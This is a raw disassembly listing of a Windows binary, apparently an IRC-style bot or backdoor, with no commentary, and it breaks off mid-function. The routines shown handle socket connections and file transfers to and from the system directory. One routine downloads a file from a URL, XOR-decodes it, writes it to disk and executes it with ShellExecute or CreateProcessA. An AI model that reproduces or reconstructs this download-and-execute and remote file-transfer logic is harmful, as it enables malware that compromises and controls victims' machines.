call ds:dword_43F6EC ; gethostbyname
test eax, eax
jz short loc_40C347
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_40C32C: ; CODE XREF: sub_40C2CB+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h
push eax
push edi
call ds:dword_43F610 ; connect
cmp eax, esi
jnz short loc_40C34B
push edi
call ds:dword_43F700 ; closesocket
loc_40C347: ; CODE XREF: sub_40C2CB+1B�j
; sub_40C2CB+58�j
mov eax, esi
jmp short loc_40C34D
; ---------------------------------------------------------------------------
loc_40C34B: ; CODE XREF: sub_40C2CB+73�j
mov eax, edi
loc_40C34D: ; CODE XREF: sub_40C2CB+7E�j
pop edi
pop esi
leave
retn
sub_40C2CB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C351 proc near ; DATA XREF: sub_40EE72+A88�o
var_11B4 = byte ptr -11B4h
var_1B4 = byte ptr -1B4h
var_1AC = byte ptr -1ACh
var_94 = byte ptr -94h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 11B4h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1B4]
rep movsd
push 1
pop esi
push [ebp+var_14]
mov [eax+1B0h], esi
lea eax, [ebp+var_1AC]
push eax
call sub_40C2CB
mov ebx, eax
pop ecx
cmp ebx, 0FFFFFFFFh
pop ecx
jnz short loc_40C3E4
lea eax, [ebp+var_11B4]
push offset dword_42E0D4
push eax
call sub_4172AE
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40C3C7
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40D679
add esp, 14h
loc_40C3C7: ; CODE XREF: sub_40C351+59�j
lea eax, [ebp+var_11B4]
push eax
call sub_40BF6D
push [ebp+var_10]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
loc_40C3E4: ; CODE XREF: sub_40C351+3F�j
push offset byte_43C80C
push ebx
call sub_40B56C
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jnz short loc_40C44F
lea eax, [ebp+var_11B4]
push offset dword_42E094
push eax
call sub_4172AE
xor edi, edi
pop ecx
cmp [ebp+var_8], edi
pop ecx
jnz short loc_40C42B
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40D679
add esp, 14h
loc_40C42B: ; CODE XREF: sub_40C351+BD�j
lea eax, [ebp+var_11B4]
push eax
call sub_40BF6D
pop ecx
push ebx
call ds:dword_43F700 ; closesocket
push [ebp+var_10]
call sub_417076
pop ecx
push esi
call ds:dword_424054 ; ExitThread
loc_40C44F: ; CODE XREF: sub_40C351+A3�j
push 64h
call ds:dword_424064 ; Sleep
xor edi, edi
mov esi, 1000h
loc_40C45E: ; CODE XREF: sub_40C351+168�j
push esi
lea eax, [ebp+var_11B4]
push edi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_11B4]
push edi
push esi
push eax
push ebx
call ds:dword_43F680 ; recv
test eax, eax
jle short loc_40C4BB
lea eax, [ebp+var_11B4]
push offset asc_42A660 ; "\n"
push eax
call sub_4179D0
lea eax, [ebp+var_11B4]
push eax
call sub_40B358
add esp, 0Ch
test eax, eax
jz short loc_40C4BB
push 64h
call ds:dword_424064 ; Sleep
push 7
call sub_416FA2
test eax, eax
pop ecx
jnz short loc_40C45E
loc_40C4BB: ; CODE XREF: sub_40C351+130�j
; sub_40C351+154�j
lea eax, [ebp+var_11B4]
push offset dword_42E050
push eax
call sub_4172AE
cmp [ebp+var_8], edi
pop ecx
pop ecx
jnz short loc_40C4EE
push edi
lea eax, [ebp+var_11B4]
push [ebp+var_C]
push eax
lea eax, [ebp+var_94]
push eax
push ebx
call sub_40D679
add esp, 14h
loc_40C4EE: ; CODE XREF: sub_40C351+180�j
lea eax, [ebp+var_11B4]
push eax
call sub_40BF6D
pop ecx
push ebx
call ds:dword_43F700 ; closesocket
push [ebp+var_10]
call sub_417076
pop ecx
push edi
call ds:dword_424054 ; ExitThread
sub_40C351 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C512 proc near ; DATA XREF: sub_40EE72+4A7C�o
var_A04 = byte ptr -0A04h
var_604 = byte ptr -604h
var_500 = dword ptr -500h
var_4FC = dword ptr -4FCh
var_3FC = byte ptr -3FCh
var_1FC = dword ptr -1FCh
var_1F8 = dword ptr -1F8h
var_1E0 = byte ptr -1E0h
var_DC = byte ptr -0DCh
var_58 = dword ptr -58h
var_54 = dword ptr -54h
var_50 = dword ptr -50h
var_48 = byte ptr -48h
var_44 = dword ptr -44h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2E = dword ptr -2Eh
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0A04h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1FC]
rep movsd
push 1
xor esi, esi
pop ebx
mov [ebp+var_10], esi
push esi
push ebx
push 2
mov [eax+1B0h], ebx
mov [ebp+var_C], esi
mov [ebp+var_20], esi
call ds:dword_43F6E8 ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_18], edi
jnz short loc_40C560
push offset dword_42E258
jmp loc_40C719
; ---------------------------------------------------------------------------
loc_40C560: ; CODE XREF: sub_40C512+42�j
push 10h
lea eax, [ebp+var_30]
push esi
push eax
call sub_417330
add esp, 0Ch
mov [ebp+var_30], 2
push esi
call ds:dword_43F668 ; htons
mov word ptr [ebp+var_2E], ax
lea eax, [ebp+var_30]
push 10h
push eax
push edi
mov [ebp+var_2E+2], esi
call ds:dword_43F694 ; bind
test eax, eax
jz short loc_40C59E
push offset dword_42E224
jmp loc_40C719
; ---------------------------------------------------------------------------
loc_40C59E: ; CODE XREF: sub_40C512+80�j
lea eax, [ebp+var_1C]
mov [ebp+var_1C], 10h
push eax
lea eax, [ebp+var_30]
push eax
push edi
call ds:dword_43F60C ; getsockname
push [ebp+var_2E]
call ds:dword_43F5A4 ; htons
mov [ebp+var_4], eax
lea eax, [ebp+var_1E0]
push eax
mov [ebp+arg_0], esi
call sub_417AB0
pop ecx
loc_40C5D0: ; CODE XREF: sub_40C512+EF�j
mov ecx, [ebp+arg_0]
mov al, [ebp+ecx+var_1E0]
cmp al, 20h
jnz short loc_40C5E3
push 5Fh
pop eax
jmp short loc_40C5E6
; ---------------------------------------------------------------------------
loc_40C5E3: ; CODE XREF: sub_40C512+CA�j
movsx eax, al
loc_40C5E6: ; CODE XREF: sub_40C512+CF�j
mov [ebp+ecx+var_604], al
lea eax, [ebp+var_1E0]
inc ecx
push eax
mov [ebp+arg_0], ecx
call sub_417AB0
cmp [ebp+arg_0], eax
pop ecx
jbe short loc_40C5D0
push ebx
push edi
call ds:dword_43F690 ; listen
test eax, eax
jz short loc_40C619
push offset dword_42E0D4
jmp loc_40C719
; ---------------------------------------------------------------------------
loc_40C619: ; CODE XREF: sub_40C512+FB�j
push esi
push esi
push 3
push esi
push ebx
lea eax, [ebp+var_1E0]
push 80000000h
push eax
call ds:off_424084
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_40C643
push offset dword_42E1F4
jmp loc_40C719
; ---------------------------------------------------------------------------
loc_40C643: ; CODE XREF: sub_40C512+125�j
push esi
push eax
call ds:off_4240A4
mov [ebp+arg_0], eax
push eax
movzx eax, word ptr [ebp+var_4]
push eax
push [ebp+var_1FC]
call sub_40AEE0
pop ecx
push eax
call ds:dword_43F6A8 ; inet_addr
push eax
call ds:dword_43F664 ; htonl
push eax
lea eax, [ebp+var_1E0]
push eax
lea eax, [ebp+var_3FC]
push offset dword_42E1DC
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_3FC]
push esi
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_40D679
add esp, 2Ch
lea eax, [ebp+var_38]
mov [ebp+var_38], 3Ch
mov [ebp+var_34], esi
push eax
push esi
lea eax, [ebp+var_500]
push esi
push eax
push esi
mov [ebp+var_4FC], edi
mov [ebp+var_500], ebx
call ds:dword_43F650 ; select
test eax, eax
jg short loc_40C6F3
push esi
lea eax, [ebp+var_DC]
push [ebp+var_54]
push offset dword_42E1B4
push eax
push [ebp+var_1FC]
call sub_40D679
jmp loc_40C817
; ---------------------------------------------------------------------------
loc_40C6F3: ; CODE XREF: sub_40C512+1BF�j
lea eax, [ebp+var_14]
mov [ebp+var_14], 10h
push eax
lea eax, [ebp+var_48]
push eax
push edi
call ds:dword_43F6FC ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_1F8], eax
jnz short loc_40C72C
push offset dword_42E180
loc_40C719: ; CODE XREF: sub_40C512+49�j
; sub_40C512+87�j ...
lea eax, [ebp+var_3FC]
push eax
call sub_4172AE
pop ecx
pop ecx
jmp loc_40C81A
; ---------------------------------------------------------------------------
loc_40C72C: ; CODE XREF: sub_40C512+200�j
push edi
call ds:dword_43F700 ; closesocket
cmp [ebp+arg_0], esi
jz loc_40C7DE
mov edi, 400h
loc_40C741: ; CODE XREF: sub_40C512+2C3�j
mov eax, [ebp+arg_0]
mov [ebp+var_4], edi
cmp eax, edi
jge short loc_40C74E
mov [ebp+var_4], eax
loc_40C74E: ; CODE XREF: sub_40C512+237�j
push edi
lea eax, [ebp+var_A04]
push esi
push eax
call sub_417330
mov eax, [ebp+arg_0]
add esp, 0Ch
neg eax
push 2
push esi
push eax
push [ebp+var_8]
call ds:off_4240C0
lea eax, [ebp+var_20]
push esi
push eax
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_8]
call ds:off_424074
push esi
lea eax, [ebp+var_A04]
push [ebp+var_4]
push eax
push [ebp+var_1F8]
call ds:dword_43F6B8 ; send
mov [ebp+var_4], eax
push esi
cdq
add [ebp+var_10], eax
lea eax, [ebp+var_A04]
push edi
push eax
push [ebp+var_1F8]
adc [ebp+var_C], edx
call ds:dword_43F680 ; recv
cmp eax, ebx
jl loc_40C873
mov eax, [ebp+var_4]
cmp eax, ebx
jl loc_40C873
sub [ebp+arg_0], eax
jnz loc_40C741
mov edi, [ebp+var_18]
loc_40C7DE: ; CODE XREF: sub_40C512+224�j
push [ebp+var_8]
call ds:off_424078
push [ebp+var_C]
push [ebp+var_10]
call sub_40D01A
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1E0]
push eax
push [ebp+var_44]
call ds:dword_43F6F4 ; inet_ntoa
push eax
lea eax, [ebp+var_3FC]
push offset dword_42E130
push eax
call sub_4172AE
loc_40C817: ; CODE XREF: sub_40C512+1DC�j
add esp, 14h
loc_40C81A: ; CODE XREF: sub_40C512+215�j
cmp [ebp+var_50], esi
jnz short loc_40C83F
push esi
lea eax, [ebp+var_3FC]
push [ebp+var_54]
push eax
lea eax, [ebp+var_DC]
push eax
push [ebp+var_1FC]
call sub_40D679
add esp, 14h
loc_40C83F: ; CODE XREF: sub_40C512+30B�j
lea eax, [ebp+var_3FC]
push eax
call sub_40BF6D
cmp edi, esi
pop ecx
jbe short loc_40C857
push edi
call ds:dword_43F700 ; closesocket
loc_40C857: ; CODE XREF: sub_40C512+33C�j
push [ebp+var_1F8]
call ds:dword_43F700 ; closesocket
push [ebp+var_58]
call sub_417076
pop ecx
push esi
call ds:dword_424054 ; ExitThread
loc_40C873: ; CODE XREF: sub_40C512+2AF�j
; sub_40C512+2BA�j
push esi
mov esi, offset dword_42E108
push [ebp+var_54]
lea eax, [ebp+var_DC]
push esi
push eax
push [ebp+var_1FC]
call sub_40D679
push esi
call sub_40BF6D
add esp, 18h
push [ebp+var_1F8]
call ds:dword_43F700 ; closesocket
push [ebp+var_58]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
sub_40C512 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40C8B4 proc near ; DATA XREF: sub_40EE72+7C0�o
var_14C4 = byte ptr -14C4h
var_4C4 = byte ptr -4C4h
var_2C4 = byte ptr -2C4h
var_1C0 = dword ptr -1C0h
var_1B8 = byte ptr -1B8h
var_1A4 = byte ptr -1A4h
var_A0 = byte ptr -0A0h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
mov eax, 14C4h
call sub_417B30
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 6Dh
mov esi, eax
pop ecx
lea edi, [ebp+var_1C0]
rep movsd
push 1
xor ebx, ebx
pop esi
mov [ebp+var_8], ebx
mov [eax+1B0h], esi
lea eax, [ebp+var_2C4]
push 104h
push eax
call ds:dword_424068 ; GetSystemDirectoryA
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_2C4]
push eax
lea eax, [ebp+var_2C4]
push offset aSS_2 ; "%s%s"
push eax
call sub_4172AE
add esp, 10h
lea eax, [ebp+var_2C4]
push ebx
push 80h
push 2
push ebx
push esi
push 40000000h
push eax
call ds:off_424084
cmp eax, 0FFFFFFFFh
jnz short loc_40C93E
push offset dword_42E350
jmp short loc_40C984
; ---------------------------------------------------------------------------
loc_40C93E: ; CODE XREF: sub_40C8B4+81�j
push eax
call ds:off_424078
lea eax, [ebp+var_2C4]
push offset aAB ; "a+b"
push eax
call sub_4179A8
pop ecx
cmp eax, ebx
pop ecx
mov [ebp+var_4], eax
jnz short loc_40C966
push offset dword_42E310
jmp short loc_40C984
; ---------------------------------------------------------------------------
loc_40C966: ; CODE XREF: sub_40C8B4+A9�j
push [ebp+var_20]
lea eax, [ebp+var_1B8]
push eax
call sub_40C2CB
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
mov [ebp+arg_0], eax
jnz short loc_40C997
push offset dword_42E2E0
loc_40C984: ; CODE XREF: sub_40C8B4+88�j
; sub_40C8B4+B0�j
lea eax, [ebp+var_4C4]
push eax
call sub_4172AE
pop ecx
pop ecx
jmp loc_40CA93
; ---------------------------------------------------------------------------
loc_40C997: ; CODE XREF: sub_40C8B4+C9�j
mov esi, 1000h
loc_40C99C: ; CODE XREF: sub_40C8B4+14E�j
push esi
lea eax, [ebp+var_14C4]
push ebx
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+var_14C4]
push ebx
push esi
push eax
push [ebp+arg_0]
call ds:dword_43F680 ; recv
mov edi, eax
cmp edi, ebx
jz loc_40CA63
cmp edi, 0FFFFFFFFh
jz short loc_40CA04
push [ebp+var_4]
lea eax, [ebp+var_14C4]
push edi
push 1
push eax
call sub_4196EF
add [ebp+var_8], edi
add esp, 10h
push [ebp+var_8]
call ds:dword_43F664 ; htonl
mov [ebp+var_C], eax
push ebx
lea eax, [ebp+var_C]
push 4
push eax
push [ebp+arg_0]
call ds:dword_43F6B8 ; send
jmp short loc_40C99C
; ---------------------------------------------------------------------------
loc_40CA04: ; CODE XREF: sub_40C8B4+118�j
lea eax, [ebp+var_4C4]
push offset dword_42E108
push eax
call sub_4172AE
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_40D679
lea eax, [ebp+var_4C4]
push eax
call sub_40BF6D
push [ebp+var_4]
call sub_417900
add esp, 24h
push [ebp+arg_0]
call ds:dword_43F700 ; closesocket
push [ebp+var_1C]
call sub_417076
pop ecx
push 1
call ds:dword_424054 ; ExitThread
loc_40CA63: ; CODE XREF: sub_40C8B4+10F�j
mov eax, [ebp+var_8]
cdq
push edx
push eax
call sub_40D01A
pop ecx
pop ecx
push eax
lea eax, [ebp+var_1A4]
push eax
lea eax, [ebp+var_1B8]
push eax
lea eax, [ebp+var_4C4]
push offset dword_42E28C
push eax
call sub_4172AE
add esp, 14h
loc_40CA93: ; CODE XREF: sub_40C8B4+DE�j
cmp [ebp+var_14], ebx
jnz short loc_40CAB8
push ebx
lea eax, [ebp+var_4C4]
push [ebp+var_18]
push eax
lea eax, [ebp+var_A0]
push eax
push [ebp+var_1C0]
call sub_40D679
add esp, 14h
loc_40CAB8: ; CODE XREF: sub_40C8B4+1E2�j
lea eax, [ebp+var_4C4]
push eax
call sub_40BF6D
cmp [ebp+var_4], ebx
pop ecx
jz short loc_40CAD3
push [ebp+var_4]
call sub_417900
pop ecx
loc_40CAD3: ; CODE XREF: sub_40C8B4+214�j
cmp [ebp+arg_0], ebx
jbe short loc_40CAE1
push [ebp+arg_0]
call ds:dword_43F700 ; closesocket
loc_40CAE1: ; CODE XREF: sub_40C8B4+222�j
push [ebp+var_1C]
call sub_417076
pop ecx
push ebx
call ds:dword_424054 ; ExitThread
sub_40C8B4 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CAF1 proc near ; DATA XREF: sub_40EE72+381E�o
; sub_40EE72+3F6D�o
var_570 = qword ptr -570h
var_564 = qword ptr -564h
var_510 = byte ptr -510h
var_310 = dword ptr -310h
var_304 = dword ptr -304h
var_2E4 = dword ptr -2E4h
var_2E0 = word ptr -2E0h
var_2CC = dword ptr -2CCh
var_2C8 = byte ptr -2C8h
var_248 = byte ptr -248h
var_148 = byte ptr -148h
var_48 = dword ptr -48h
var_44 = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_24 = byte ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = byte ptr -10h
var_8 = qword ptr -8
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 510h
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
mov ecx, 0AAh
mov esi, eax
lea edi, [ebp+var_2CC]
push 1
rep movsd
pop edi
xor esi, esi
push esi
mov [eax+2A4h], edi
push esi
push esi
lea eax, [ebp+var_248]
push esi
push eax
push ds:dword_43F618
call ds:dword_43F578 ; InternetOpenUrlA
cmp eax, esi
mov [ebp+var_18], eax
jz loc_40CF7D
push esi
push esi
push 2
push esi
push esi
lea eax, [ebp+var_148]
push 40000000h
push eax
call ds:off_424084
cmp eax, edi
mov [ebp+var_20], eax
jnb short loc_40CBB8
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset unk_42E5E4
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40CB9B
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
add esp, 14h
loc_40CB9B: ; CODE XREF: sub_40CAF1+88�j
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
push [ebp+var_48]
call sub_417076
pop ecx
pop ecx
push esi
call ds:dword_424054 ; ExitThread
loc_40CBB8: ; CODE XREF: sub_40CAF1+68�j
xor edi, edi
call ds:dword_424058 ; GetTickCount
mov ebx, 7D000h
mov dword ptr [ebp+var_8+4], eax
push ebx
call sub_417B89
pop ecx
mov [ebp+var_1C], eax
loc_40CBD2: ; CODE XREF: sub_40CAF1+1B4�j
push 200h
lea eax, [ebp+var_510]
push esi
push eax
call sub_417330
add esp, 0Ch
lea eax, [ebp+arg_0]
push eax
lea eax, [ebp+var_510]
push 200h
push eax
push [ebp+var_18]
call ds:dword_43F580 ; InternetReadFile
cmp [ebp+var_34], esi
jz short loc_40CC16
push [ebp+arg_0]
lea eax, [ebp+var_510]
push eax
call sub_40CFE3
pop ecx
pop ecx
loc_40CC16: ; CODE XREF: sub_40CAF1+112�j
lea eax, [ebp+var_24]
push esi
push eax
lea eax, [ebp+var_510]
push [ebp+arg_0]
push eax
push [ebp+var_20]
call ds:dword_42407C ; WriteFile
cmp edi, ebx
jnb short loc_40CC54
mov eax, ebx
sub eax, edi
cmp eax, [ebp+arg_0]
jbe short loc_40CC3E
mov eax, [ebp+arg_0]
loc_40CC3E: ; CODE XREF: sub_40CAF1+148�j
push eax
lea eax, [ebp+var_510]
push eax
mov eax, [ebp+var_1C]
add eax, edi
push eax
call sub_417390
add esp, 0Ch
loc_40CC54: ; CODE XREF: sub_40CAF1+13F�j
add edi, [ebp+arg_0]
cmp [ebp+var_3C], esi
jz short loc_40CC61
cmp edi, [ebp+var_3C]
ja short loc_40CCAB
loc_40CC61: ; CODE XREF: sub_40CAF1+169�j
cmp [ebp+var_44], 1
mov eax, edi
jz short loc_40CC7B
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_42E59C
jmp short loc_40CC8B
; ---------------------------------------------------------------------------
loc_40CC7B: ; CODE XREF: sub_40CAF1+176�j
shr eax, 0Ah
push eax
lea eax, [ebp+var_248]
push eax
push offset unk_42E55C
loc_40CC8B: ; CODE XREF: sub_40CAF1+188�j
mov eax, [ebp+var_48]
imul eax, 234h
add eax, offset dword_444EC0
push eax
call sub_4172AE
add esp, 10h
cmp [ebp+arg_0], esi
ja loc_40CBD2
loc_40CCAB: ; CODE XREF: sub_40CAF1+16E�j
cmp [ebp+var_3C], esi
mov [ebp+var_14], 1
jz short loc_40CD00
cmp edi, [ebp+var_3C]
jz short loc_40CD00
push [ebp+var_3C]
lea eax, [ebp+var_510]
mov [ebp+var_14], esi
push edi
push offset unk_42E518
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
add esp, 28h
loc_40CD00: ; CODE XREF: sub_40CAF1+1C4�j
; sub_40CAF1+1C9�j
call ds:dword_424058 ; GetTickCount
sub eax, dword ptr [ebp+var_8+4]
xor edx, edx
mov ecx, 3E8h
push [ebp+var_20]
div ecx
xor edx, edx
mov ecx, eax
mov eax, edi
inc ecx
div ecx
mov ebx, eax
call ds:off_424078
push [ebp+var_1C]
call sub_417C3B
cmp [ebp+var_38], esi
pop ecx
jz short loc_40CD8A
lea eax, [ebp+var_148]
push eax
call sub_40C259
cmp eax, [ebp+var_38]
pop ecx
jz short loc_40CD8A
push [ebp+var_38]
mov [ebp+var_14], esi
push eax
lea eax, [ebp+var_510]
push offset unk_42E4E0
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
add esp, 28h
loc_40CD8A: ; CODE XREF: sub_40CAF1+241�j
; sub_40CAF1+253�j
cmp [ebp+var_14], esi
jz loc_40CFCA
cmp [ebp+var_44], 1
jz loc_40CE85
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_424698
lea eax, [ebp+var_148]
fstp [esp+564h+var_564]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_424698
fstp [esp+570h+var_570]
push offset unk_42E498
push eax
call sub_4172AE
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40CE05
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
add esp, 14h
loc_40CE05: ; CODE XREF: sub_40CAF1+2F2�j
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
cmp [ebp+var_40], 1
pop ecx
jnz loc_40CFCA
push 5
push esi
lea eax, [ebp+var_148]
push esi
push eax
push offset aOpen ; "open"
push esi
call ds:dword_43F5DC
cmp [ebp+var_30], esi
jnz loc_40CFCA
lea eax, [ebp+var_148]
push eax
lea eax, [ebp+var_510]
push offset dword_42E464
push eax
call sub_4172AE
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
add esp, 24h
jmp loc_40CFCA
; ---------------------------------------------------------------------------
loc_40CE85: ; CODE XREF: sub_40CAF1+2A6�j
mov dword ptr [ebp+var_8], ebx
mov dword ptr [ebp+var_8+4], esi
fild [ebp+var_8]
push ecx
push ecx
mov dword ptr [ebp+var_8], edi
mov dword ptr [ebp+var_8+4], esi
fmul ds:dbl_424698
lea eax, [ebp+var_148]
fstp [esp+564h+var_564]
fild [ebp+var_8]
push eax
push ecx
push ecx
lea eax, [ebp+var_510]
fmul ds:dbl_424698
fstp [esp+570h+var_570]
push offset unk_42E414
push eax
call sub_4172AE
add esp, 1Ch
cmp [ebp+var_30], esi
jnz short loc_40CEED
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
add esp, 14h
loc_40CEED: ; CODE XREF: sub_40CAF1+3DA�j
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
push 10h
lea eax, [ebp+var_10]
push esi
push eax
call sub_417330
push 44h
lea eax, [ebp+var_310]
pop edi
push edi
push esi
push eax
call sub_417330
add esp, 1Ch
mov [ebp+var_310], edi
lea eax, [ebp+var_10]
mov [ebp+var_304], offset byte_43C80C
push 1
mov [ebp+var_2E0], si
pop edi
push eax
lea eax, [ebp+var_310]
push eax
push esi
push esi
push 28h
push esi
push esi
lea eax, [ebp+var_148]
push esi
push eax
push esi
mov [ebp+var_2E4], edi
call ds:dword_424120 ; CreateProcessA
cmp eax, edi
jnz short loc_40CF6F
call ds:dword_43F5C8 ; WSACleanup
call sub_40AC42
push esi
call ds:off_42414C
loc_40CF6F: ; CODE XREF: sub_40CAF1+46A�j
lea eax, [ebp+var_148]
push eax
push offset unk_42E3CC
jmp short loc_40CF89
; ---------------------------------------------------------------------------
loc_40CF7D: ; CODE XREF: sub_40CAF1+45�j
lea eax, [ebp+var_248]
push eax
push offset unk_42E390
loc_40CF89: ; CODE XREF: sub_40CAF1+48A�j
lea eax, [ebp+var_510]
push eax
call sub_4172AE
add esp, 0Ch
cmp [ebp+var_30], esi
jnz short loc_40CFBD
push esi
lea eax, [ebp+var_510]
push [ebp+var_2C]
push eax
lea eax, [ebp+var_2C8]
push eax
push [ebp+var_2CC]
call sub_40D679
add esp, 14h
loc_40CFBD: ; CODE XREF: sub_40CAF1+4AA�j
lea eax, [ebp+var_510]
push eax
call sub_40BF6D
pop ecx
loc_40CFCA: ; CODE XREF: sub_40CAF1+29C�j
; sub_40CAF1+325�j ...
push [ebp+var_18]
call ds:dword_43F69C ; InternetCloseHandle
push [ebp+var_48]
call sub_417076
pop ecx
push esi
call ds:dword_424054 ; ExitThread
sub_40CAF1 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_40CFE3 proc near ; CODE XREF: sub_40CAF1+11E�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov eax, [esp+arg_0]
xor ecx, ecx
cmp [esp+arg_4], ecx
jle short locret_40CFFF
loc_40CFEF: ; CODE XREF: sub_40CFE3+1A�j
mov dl, ds:byte_42F5C4
xor [ecx+eax], dl
inc ecx
cmp ecx, [esp+arg_4]
jl short loc_40CFEF
locret_40CFFF: ; CODE XREF: sub_40CFE3+A�j
retn
sub_40CFE3 endp
; =============== S U B R O U T I N E =======================================
sub_40D000 proc near ; CODE XREF: sub_40EE72+2A7E�p
; sub_40EE72+2BA4�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push [esp+arg_4]
push [esp+4+arg_0]
call sub_4197F9
pop ecx
pop ecx
xor ecx, ecx
cmp eax, 0FFFFFFFFh
setnz cl
mov eax, ecx
retn
sub_40D000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40D01A proc near ; CODE XREF: sub_406387+458�p
; sub_406387+5FD�p ...
var_38 = byte ptr -38h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 38h
and [ebp+var_4], 0
push ebx
push esi
push edi
push 32h
mov edi, offset dword_443A38
push 0
push edi
call sub_417330
mov ebx, [ebp+arg_0]
add esp, 0Ch
lea esi, [ebp+var_38]
loc_40D03F: ; CODE XREF: sub_40D01A+5B�j
; sub_40D01A+61�j
push 0
push 0Ah
push [ebp+arg_4]
push ebx
call sub_4191D0
push 0
push 0Ah
push [ebp+arg_4]
add al, 30h
mov [esi], al
inc esi
push ebx
call sub_419250
mov ebx, eax
or eax, edx
mov [ebp+arg_4], edx
jz short loc_40D07D
inc [ebp+var_4]
push 3
mov eax, [ebp+var_4]
pop ecx
cdq
idiv ecx
test edx, edx
jnz short loc_40D03F
mov byte ptr [esi], 2Ch
inc esi
jmp short loc_40D03F
; ---------------------------------------------------------------------------
loc_40D07D: ; CODE XREF: sub_40D01A+4B�j
dec esi
mov eax, edi
loc_40D080: ; CODE XREF: sub_40D01A+73�j
lea ecx, [ebp+var_38]
cmp esi, ecx
